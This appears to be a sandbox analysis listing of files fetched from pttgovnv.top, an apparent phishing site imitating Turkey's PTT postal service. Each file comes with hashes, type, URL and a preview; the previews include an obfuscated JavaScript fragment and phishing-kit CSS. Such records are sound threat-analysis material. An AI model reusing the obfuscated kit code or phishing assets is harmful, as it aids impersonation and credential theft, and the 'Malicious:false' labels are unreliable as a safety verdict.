          SHA-256:294E75B0E7510057A175FFF959C4EF20249DA107A3CE2CEE0D5A19CB138694E4
          SHA-512:B1E1BDC77DBA9F648B0BE98A8BB2959E135103D51D203B3714419F59E81AEE5DD53B02E206862AF80109FA5A336DFC7E707D35906514D8008ED9FF888FDE64ED
          Malicious:false
          Reputation:low
          Preview:var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1bf(0x644))/0x4)+parseInt(_0x9ea1bf(0x58d))/0x5*(parseInt(_0x9ea1bf(0x690))/0x6)+-parseInt(_0x9ea1bf(0x41c))/0x7*(-parseInt(_0x9ea1bf(0x14d))/0x8)+-parseInt(_0x9ea1bf(0x51f))/0x9+parseInt(_0x9ea1bf(0x236))/0xa*(-parseInt(_0x9ea1bf(0x283))/0xb);if(_0x53ae22===_0x549cdb)break;else _0x218c3b['push'](_0x218c3b['shift']());}catch(_0x1145ce){_0x218c3b['push'](_0x218c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea9eb=!![];return function(_0x3eb55f,_0x1b8e91){var _0x3870d7=_0x4ea9eb?function(){var _0x12f3a9=a38_0x435b;if(_0x1b8e91){var _0x30af4e=_0x1b8e91
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Web Open Font Format, TrueType, length 62844, version 1.0
          Category:downloaded
          Size (bytes):62844
          Entropy (8bit):7.991698062787078
          Encrypted:true
          SSDEEP:1536:JrXBaLm85xBAFLdZ20ZcY8EWebeHsTPj+Ha81:1RD8PBMZQ0ZcYi/19
          MD5:963EB32907744D9A0D6B98127162808F
          SHA1:C7ACBCE006E0C9139608F078CBE3B0876C9ACE66
          SHA-256:8560F9BDDDAA5E89F2D1D1403681932C574DE5377C6D0DD5C1AA408C91A3E979
          SHA-512:0BE3BB5FCEFF7C79758DEF92108E8737D1590459CD16940966D2DBB2AE094A408429FCD1F0774DFEC4623B9E316CDA17A575D858AAA1ED8BBE31D293C23167D4
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/8560f9bdkFGym.woff
          Preview:wOFF.......|................................FFTM............].(ZGDEF........... ....GPOS....... ... l.t.GSUB............H...OS/2.......^...`..]cmap......."...~.*..cvt ...4...4...4....fpgm...h.......e../.gasp................glyf...$......_ ..i0head.......3...6.4.lhhea...0...!...$....hmtx...T........H.M.loca...L...:...d...@maxp...... ... ....name...........%N@.post..........p..$Kprep...........;............o1.....B.........Mx.c`d``..b...`b..7.I.0.....................latn................x.]RMk.Q.=oN.4..@....qQ.(.*d..R.L.)]...L.e&F.~jm......~.U.M.K....R. ""...Bz..(.s..~.;.....|.rK~....;..H_v.@......6..FDTQ.../b...J.w..q\r+W].V.=tC.Wr}.=.|.F./.,x....wL.V...vA...6s.._..O.a..].F/2.....F1...<....?..-...7.>l.J...JI..B|.w|.m.H<.A|.>..U..Hp....4g8...9..<....|.G|.g|....@.....x....'~.7...y.....5a5.?..sE.+..i..\.:7..W|.7...Z\. )J.:.[..d.....M]K..=.G.....E\....$N.x.H....O..P...g.......9.y[f..a.p..$.aU0G_0k&....`..x.c`f.......:....Q.B3_dHc|................B4.....3.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):33304
          Entropy (8bit):7.961845706148848
          Encrypted:false
          SSDEEP:768:QaNY3WBAdXYZ8AcxJHaF3LLnuboDyLoAy2jRROV:QaNYGIXHNJH+3fnuc+oUr2
          MD5:1E5D3CDE4B44D1B35A2CC5EA301E1CBE
          SHA1:49491E19C66AB8D4937218756CAF7E032FEE57D1
          SHA-256:91D51089265627863046D01E337C732315D18F75B9D1788C909DF6A79E117281
          SHA-512:1CDECBF63B8E01B80CB7DAB82D3FAAE2C40ABFA3A91FCD80684540048F07D5D5DDC25ED3907A821A0ADCE2F93A5A1612C9E082AC8F75D938BD3A01CF18ED5DF7
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/45.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...x.......n..!$.BB....,.\. ..UZk..=...b.Bmk..k...rj[..}.......Z-U..#...(...!.B....g.....,...;3.......<.........;.k.... ..B.!.E*w.!..B.E.!..B...#..B.!.q..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B...#..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...#..B.!.q..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B.E.!..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...#..B...#..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B.E.!..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...t..BH2.\:.\.......'..r..B........BH<..*..Ji).,....x.._.WZ...{<....B.}.<"...8B..(.........G..G.=.2D.%y.~.U..v[..-.QW.Y .h.#.P..B..`..J+...._...q.ckGN.].D.."...1.......VsVZ..q.,..v...8BH"..J.hS...m...j....S~,.%.z.._....o......
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):18614
          Entropy (8bit):7.842656829907835
          Encrypted:false
          SSDEEP:384:1t61ypWjXqE+0b5KjYyr/Rl4I29curptBVL+VWrapslaYo:1QrjXqEnolyd3BqeapZX
          MD5:5C8C2703821C3A1F3D4600D64E1DB92D
          SHA1:060647274799061728A0F06E7B8C3EC61EB64439
          SHA-256:4B9A02D91E97FA5B053EB85955E9C38A2594E2667838181748BBDF70BDE901A5
          SHA-512:4813636EE30E3E082763DA35A6E454081AFB39466FDB553215A66B429328A8DC8A3D24987A26ADC6D1D78D70301C6BBFCDA99D51CFA799DBB9BBE10668097016
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/43.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..HCIDATx.....\e............&.....iDWGd..8.3.i..wW....av.4^Vfu.Yv.Q?#.E.e\H.q........C...$. .t.s..O......rnu.}?..Cw]N.:U._..y.T*%....-.!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8B....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q.8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........`.`....j4.....B~.....j.n...f...2...[z.3.d............2...K.8..P].m..,,p.vB\nt....J..^.............J..l.[>=>.=I......om.]..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (18369)
          Category:downloaded
          Size (bytes):18593
          Entropy (8bit):5.712888637345886
          Encrypted:false
          SSDEEP:384:xE+fKMCY42wpgfvlqjUU4Qar3OTLc6rZ0opgTMFIowsPN:xEhFpWqjUURCeTo6rZ0/T+IoV
          MD5:615C089C71C979729E2BCF60A61D7934
          SHA1:4A3FCB37162D27CFCC228E4606266F98354D77E4
          SHA-256:A8D792CFA16979C7A84EB1BDBB4107885941F7901C25944EA96EE2863FC42406
          SHA-512:C0DB5C73DF1E01CC845BF365CA3702D2358D983DCC7C8E86283734BDD38F0D2DAC2C3D3AF14BB59927C435DB8CFB37B62A6DE09C3A36A4206F4D65F1E3FE3ADD
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/js/ua-parser.min.js
          Preview:/*!. * UAParser.js v0.7.21. * Lightweight JavaScript-based User-Agent string parser. * https://github.com/faisalman/ua-parser-js. *. * Copyright . 2012-2019 Faisal Salman <f@faisalman.com>. * Licensed under MIT License. */.(function(window,undefined){"use strict";var LIBVERSION="0.7.21",EMPTY="",UNKNOWN="?",FUNC_TYPE="function",UNDEF_TYPE="undefined",OBJ_TYPE="object",STR_TYPE="string",MAJOR="major",MODEL="model",NAME="name",TYPE="type",VENDOR="vendor",VERSION="version",ARCHITECTURE="architecture",CONSOLE="console",MOBILE="mobile",TABLET="tablet",SMARTTV="smarttv",WEARABLE="wearable",EMBEDDED="embedded";var util={extend:function(regexes,extensions){var mergedRegexes={};for(var i in regexes){if(extensions[i]&&extensions[i].length%2===0){mergedRegexes[i]=extensions[i].concat(regexes[i])}else{mergedRegexes[i]=regexes[i]}}return mergedRegexes},has:function(str1,str2){if(typeof str1==="string"){return str2.toLowerCase().indexOf(str1.toLowerCase())!==-1}else{return false}},lowerize:function
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):14568
          Entropy (8bit):7.831658911869208
          Encrypted:false
          SSDEEP:192:suNkVU4jxZ2lHuxGgOorSNlmX//WNGclmwdc/qxES/tfJBX2NJAloDcrm6U2g+UJ:UrxslRgOoyIO4SFP/1JBW7T6U2OfwO
          MD5:29B5B29D4D533AA3E60051A8E1AD8ADB
          SHA1:B6059B2ADC66192B8A94FE52607121480AC6B389
          SHA-256:7CA1F87B86C0FE5112F036C9F914A5F2496C625749C748B73A5A64636277E677
          SHA-512:ACBF4002886324B4E8E9DC04ECAA4E3970858C69DDA62D05288631D3A31C9DFDF26AB8665426E0198F4A3A3FC8A1FBD43B8F2E0D4EF3EE65469E3F00E02066D4
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..8uIDATx...=V......=s...MD.&"...4.W.....X...9.X.EHd..Y.`Px#..wU.Y.._......s4....*u.~]....................B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q....0}.)....q..,}.. 7.(..h.w...B......~M...c......^..E....r8O.ca.}.....,...y....y.X..c..q.*....\..!...9i.;5..J...q...5....?I......v...M..........W.W...|...o...U.....8....qh>....../.y,.P7..:..Fz...d.3.e6........1..'..Q...L.q.U....|../.]-...4?.....6........i.....z..c...4s.......q. .I.qU..p...'.....s+.[.un.j.YZf.C.jI..c.V..m.c.a.@=.P.."....{.]T....8Y..y.[..8~XR.Qh..3r~.H....lw
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):10746
          Entropy (8bit):7.750448157439093
          Encrypted:false
          SSDEEP:192:pJ1sotcNTjukglXJd9p+d8Vn1LoujKwt/z318b+jJSrQPMnDQ4bM21yepESh:27VglXvnWu1Muj5p34+GnTT1yfg
          MD5:B46BD38DC53B5A97A9F2E48539B34446
          SHA1:D839AB9090F1011145FDB4AFB9F4B1E2ECCC6AA8
          SHA-256:210BBA6C4F4B3D5C3F44664310E2F32595EE8859A6051396B6FFCD90FC3B167A
          SHA-512:0B5A369BA21CC6607547D93B2E53AD7BE77999436B5E6A991D48AC4496A72606E475CB7979181695ACA126E18F28E4373C6DFE383710785D88B14420CA8B2AA4
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..).IDATx...=v.V..`L.w.VV`.r)M......S.^....^A........S..H...+......q..~.s/.R.s..L..A..x..?.}.V...Y~r....8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@...........'...D..}..o...A...x.e.d<l....n.....q......J...?Cyl..T.N......5yQ.U.[y...Y....L.q.UpL..~*__..,4.N..o..w_..Gvhg.+T2.C{Q...@.g'..p.......uT......Q..k.c'..p....p...........r...ce3B...$...:......j.;ur.>......c.>..hM..n.0 }....d...[
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (554)
          Category:downloaded
          Size (bytes):606
          Entropy (8bit):5.401289515983216
          Encrypted:false
          SSDEEP:12:fbj/1AvxAU7erXn16KkpooeWozx9LqCmVRXNtI6V:fbj/1AvxAU7e7nHkpyW2pqjXNa+
          MD5:2D8CA2FAE27B182791B29D83379AC6FE
          SHA1:3E3D56874855FBBF14BA18E99D400079F72E1137
          SHA-256:D37FF23D03D4699FEEB8C162D865538D7AEC77436D8AEB54F9652DD3BA497D89
          SHA-512:7966E30FDE7A4E6C93C1AB0DC7EC038ED26372434E6E06ED56160DED6539675D7EEF060F783ADE9475ECAF9F269236197E51438A22FDD7BDE5F1A85219B5F92B
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/pages/_error-32d9baaae5c99c79.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4820],{2904:function(t,n,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_error",function(){return r(6953)}])},6953:function(t,n,r){"use strict";r.r(n);var u=r(3288),e=r(8032);function s(t){var n=t.statusCode;return(0,u.jsx)(u.Fragment,{children:(0,u.jsx)(e.Z,{statusCode:n})})}s.getInitialProps=function(t){var n=t.res,r=t.err;return{statusCode:n?n.statusCode:r?r.statusCode:404}},n.default=s}},function(t){t.O(0,[9774,2888,179],(function(){return n=2904,t(t.s=n);var n}));var n=t.O();_N_E=n}]);.//# sourceMappingURL=_error-32d9baaae5c99c79.js.map
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):62332
          Entropy (8bit):7.984048376361694
          Encrypted:false
          SSDEEP:1536:XF1K4X0e45gJhahETAI55341LAa/ny5pqkQJJoGWkr/gk6kV1i+y4:XZ0b5gy+P41sM/Xok6xL4
          MD5:3E2AC9A8F2274B97550C20946E9E6AA7
          SHA1:5748E42EF801F5682C683CF990053C880993FAF3
          SHA-256:661C5384CC0FC72BBE7D9D938A618369DD63E2B926EEC03D2518BA2A27F83773
          SHA-512:FBCF9108314BE3A9FB61E2D82F3E8201B31B042BEBE637F2250F58D69770B5FF9FC197EC260726189F119F0C6964F39726C1F340C50087C3B2D69DEFDE79AFE7
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}..[...Q.VZi{.^.{..Wl... .'$!...~.GBI.K..._.!................Wu.3wF.+.z.^m....#k5...j..wN...A .....@ .[.R......@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....H..@ .....H..@ .....H..@ .....H..@ .....8..@ .....8..@ .....8..@ ..."q...@ ..."q...@ ..."q...@ ..D.....@ ..D.....@ ..D.....@ ........@ ........@ ........@ ........@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....H..@ .....H..@ .....H..@ .....H..@ .....8..@ .....8..@ .....8..@ ..."q...@ ..."q...@ ..."q...@ ..D.....@ ..D.....@ ..D.....@ ........@ ........@ ........@ ........@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....@$.@ .............ao..Q#.&. {..{..r.......@.9h.AZ{.!.....K'>..K......../..02...$....a.A.T..@ ...c...;..2.jUD^.I.A...=(.,....>q...<.3o'm..@ ..D...'pZ.Q.C./R.jC.gT}m..4. ..1.........$
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (7520)
          Category:downloaded
          Size (bytes):7571
          Entropy (8bit):5.418417671489399
          Encrypted:false
          SSDEEP:96:wAgS8hTvHoD9CaBbIw3uwCPOMZ8xQuP3BRGekPuvZAcCaBbIwcbwCPdHimbh63s2:evHoImzbCPO/QuPxQP7tm4cCPd7982M
          MD5:C3F59D2353A4922749DD133F0E0B4A2B
          SHA1:3B0208244AA0888B50CFD936E2568C790ACAAD92
          SHA-256:1B74DB389EFB933E6A8C0A7F3E032C4A6351F67A97EEFDC2639695D105E03890
          SHA-512:9E9A6C6ECCFA1D3F11BE65BE8BA4402F569DA0BBBDD1F77E172F04DBC72349D1AC71220BF06E7C57574C76E077F22C58EBB3CCD4131780CDD535CC2B28AF0D5F
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/pages/index-dfb7e1261ea0e06f.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{5557:function(e,t,n){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return n(8272)}])},8272:function(e,t,n){"use strict";n.r(t),n.d(t,{__N_SSP:function(){return H},default:function(){return B}});var r=n(3288),s=n(8082),a=n(4926),o=n.n(a),i=n(8196),c=n(9348),u=n(6731),l=n.n(u),f=n(2466),d=n(3395),p=n(5834),y=n.n(p),h=n(1011);var m=function(e){var t=e.stateAction;return(0,r.jsxs)("div",{id:"msm_shipment_time",className:y().container,children:[(0,r.jsx)("i",{onClick:function(){t(!1)},className:"fa-solid fa-xmark"}),(0,r.jsx)("div",{className:y().body,children:(0,r.jsx)(h.Z,{})})]})},_=n(8565),x=n.n(_),v=n(2718),j=n(3230),b=n(9792),g=n(3198),A=n.n(g);function N(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}function S(e,t,n,r,s,a,o){try{var i=e[a](o),c=i.value}catch(u){return void n(u)}i.done?t(c):Promise.resolve(c).then(r,s)}function T(e){return function(){var t=this
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
          Category:downloaded
          Size (bytes):504521
          Entropy (8bit):5.245686837916366
          Encrypted:false
          SSDEEP:12288:NtjBw2fR0+JDC9yvd8l8hiuyaqQeuKiv7fD6oAj0BBlNAroY4DPindxfy3GOpBJ/:feSDypuKiv7fD6oAj0BBlNA2exfy1Jfn
          MD5:1E8E7D0C756EE63FCBCED0E685E20191
          SHA1:1E7AEC9DE709ADDED1E8D31B0D449C3D05B68810
          SHA-256:294E75B0E7510057A175FFF959C4EF20249DA107A3CE2CEE0D5A19CB138694E4
          SHA-512:B1E1BDC77DBA9F648B0BE98A8BB2959E135103D51D203B3714419F59E81AEE5DD53B02E206862AF80109FA5A336DFC7E707D35906514D8008ED9FF888FDE64ED
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/index-f5457718.js
          Preview:var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1bf(0x644))/0x4)+parseInt(_0x9ea1bf(0x58d))/0x5*(parseInt(_0x9ea1bf(0x690))/0x6)+-parseInt(_0x9ea1bf(0x41c))/0x7*(-parseInt(_0x9ea1bf(0x14d))/0x8)+-parseInt(_0x9ea1bf(0x51f))/0x9+parseInt(_0x9ea1bf(0x236))/0xa*(-parseInt(_0x9ea1bf(0x283))/0xb);if(_0x53ae22===_0x549cdb)break;else _0x218c3b['push'](_0x218c3b['shift']());}catch(_0x1145ce){_0x218c3b['push'](_0x218c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea9eb=!![];return function(_0x3eb55f,_0x1b8e91){var _0x3870d7=_0x4ea9eb?function(){var _0x12f3a9=a38_0x435b;if(_0x1b8e91){var _0x30af4e=_0x1b8e91
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (399)
          Category:downloaded
          Size (bytes):400
          Entropy (8bit):4.876227719251662
          Encrypted:false
          SSDEEP:6:UnKqKHN4h2QWu2LzDzSRJMCxkGbRjJIr9IIVQNlMyMMU2JdtTTXRXO0EOrvdVrKS:2XW4h2JT/zSRc9IoQNf++hxFEO5wXCn
          MD5:2B914E8858486EAB2DCFEAA859EA8357
          SHA1:B782507D4E8CEDBA35AAD5CBD1C4778115A1CB12
          SHA-256:F4397CED557E01524D17B5D0988131CBF8B4C9CB5AF39749E74E3671B8EB1917
          SHA-512:1416A0872268429581E96E0A8FACB8757041CF92D74F0C0A7C1897644FBC2C4422329242E6CAB50AC1CAF366CE5D3B2CE085F20BEABB17E0893AA0D3197365CF
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/f4397cedkFGym.css
          Preview:html,body{padding:0;border:0;margin:0}img[src="data:,"],source[src="data:,"],.sf-hidden{display:none!important}#darcula-teleport-page{position:fixed;top:0;left:0;width:100vw;height:100dvh;background-color:#fff;z-index:10}input[inputmode=numeric],input[type=tel],input[inputmode=tel],input[type=email],input[inputmode=email]{direction:ltr!important}div.button-submit button{text-transform:capitalize}.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:dropped
          Size (bytes):1114
          Entropy (8bit):4.251130351888073
          Encrypted:false
          SSDEEP:24:t9LylyxETgF0Kq7mgctL++X8UEIZDXzdB+rH:2lPTgF0Kq7mggH8UZ7YH
          MD5:9090C370EF1DD7BBF36DF3798544DB2B
          SHA1:A10781354CECA73AA753B38711C44C8256CEF934
          SHA-256:7B4D3164246248283743096A9DAECF1178F07DF98F2EECBCD698208CD81CF2CD
          SHA-512:B8F3A64026602230E92FDEC3FF914D552729FC9FA107635E6161A1CCAC090E02E87A4A99ADE4432FE23BF680165407715C717AFDE663D2A83486D945315F569A
          Malicious:false
          Reputation:low
          Preview:<svg height="511pt" viewBox="-90 1 511 511.99899" style="fill:#b7b7b7;" width="511pt" xmlns="http://www.w3.org/2000/svg"><path d="m332.464844 275.082031c0-8.429687-6.835938-15.265625-15.269532-15.265625-8.433593 0-15.269531 6.835938-15.269531 15.265625 0 74.6875-60.757812 135.445313-135.445312 135.445313-74.683594 0-135.441407-60.757813-135.441407-135.445313 0-8.429687-6.835937-15.265625-15.269531-15.265625-8.433593 0-15.269531 6.835938-15.269531 15.265625 0 86.378907 66.320312 157.539063 150.710938 165.273438v41.105469h-56.664063c-8.433594 0-15.269531 6.835937-15.269531 15.269531 0 8.433593 6.835937 15.269531 15.269531 15.269531h143.871094c8.429687 0 15.265625-6.835938 15.265625-15.269531 0-8.433594-6.835938-15.269531-15.265625-15.269531h-56.667969v-41.105469c84.394531-7.730469 150.714844-78.894531 150.714844-165.273438zm0 0"/><path d="m166.480469 372.851562c53.910156 0 97.769531-43.859374 97.769531-97.769531v-177.316406c0-53.90625-43.859375-97.765625-97.769531-97.765625-53.90625 0-97
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):11236
          Entropy (8bit):7.782737264318003
          Encrypted:false
          SSDEEP:192:ZK9RLFVUR7LSdHxVoigH9+RwfTKOJsP/E+UpeiT3oCYvwAPYG9V+RMBM8T:WRLPUUjVoigawfWOGxwJ4CYv3PiCGu
          MD5:FF5BD3D7849B187DEC777004626B58FF
          SHA1:4F7FDA5D6D9E8D07E6F8485872FD962007DCF139
          SHA-256:CE97846C74192E04D8DF79782636ADDEC31439985A7278317635E7777F365667
          SHA-512:28555EB25B6F46D8623E1338DAD84E431BA354A1B5A1750E6D3FE86FDDCF78D28C3CDD026BF6F30A8DE4585657453E070F6068A8A6654A0CE5EE34BADF3E12A9
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/33.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..+qIDATx...MV........g.&#.to.y.&.4-..d.QF`<...........F...5#....e.HU{..J<.ZZ.9.Q....?}.....`\.8...B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B...B........7T....Z....../.r.Z9.?gu....?.'..x.......L...<..X.|.m...}.}>.?.k~.,..z..:.8.{}n.._...s......%..i].\..}.i.V..k.Y..].....~>[...._....L........xU...O..|W....p{.!.|@..y.@.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (17553), with no line terminators
          Category:dropped
          Size (bytes):17555
          Entropy (8bit):5.212307168759353
          Encrypted:false
          SSDEEP:192:BfZT1WkfJ4FOFDULEKALK2bq1pnv313SY7GhePO1yd816+hePXZ0dLXvLMOW4RxE:BGkf8eDeTEK2anv30uSZ6jeNMJl5ll
          MD5:932AB86A485C5448691469792A137121
          SHA1:3BA7F519F870F7664779F3765959D07971F6165D
          SHA-256:8FB9EEF58678EAE781227CFAD2EAD48E90FDD5917AC83BC097225BA243B63F3B
          SHA-512:D5B0B3B9566BBE7F51B1629C145E62DE854F440C19E9D47FC076D6F7A96BE8AC032F2BA935FCC6CB5C2FE2E08EE11750DBD2918C6E19939EEC4707DFAFFF2A42
          Malicious:false
          Reputation:low
